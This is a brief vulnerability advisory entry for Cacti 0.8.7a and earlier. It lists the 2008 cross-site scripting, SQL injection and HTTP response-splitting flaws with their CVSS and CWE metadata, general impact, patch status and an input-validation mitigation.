Vendor: Cacti
By: SecurityFocus
CVSS: 7.5 HIGH
Multiple Cross-Site Scripting, Multiple SQL-Injection, HTTP Response-Splitting
CWE: 79, 89, 113
Product Name: Cacti
Affected Version From: Cacti 0.8.7a and prior versions
Affected Version To: Cacti 0.8.7a and prior versions
Patch Exists: YES
Related CWE: N/A
CPE: a:cacti:cacti
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Cacti Multiple Unspecified Input-Validation Vulnerabilities
Cacti is prone to multiple unspecified input-validation vulnerabilities, including multiple cross-site scripting vulnerabilities, multiple SQL-injection vulnerabilities, and an HTTP response-splitting vulnerability. Attackers may exploit these vulnerabilities to influence or misrepresent how web content is served, cached, or interpreted, to compromise the application, to access or modify data, to exploit vulnerabilities in the underlying database, or to execute arbitrary script code in the browser of an unsuspecting user.
Mitigation:
Input validation should be used to ensure that untrusted data is not used to compromise the application, access or modify data, or execute arbitrary script code in the browser of an unsuspecting user.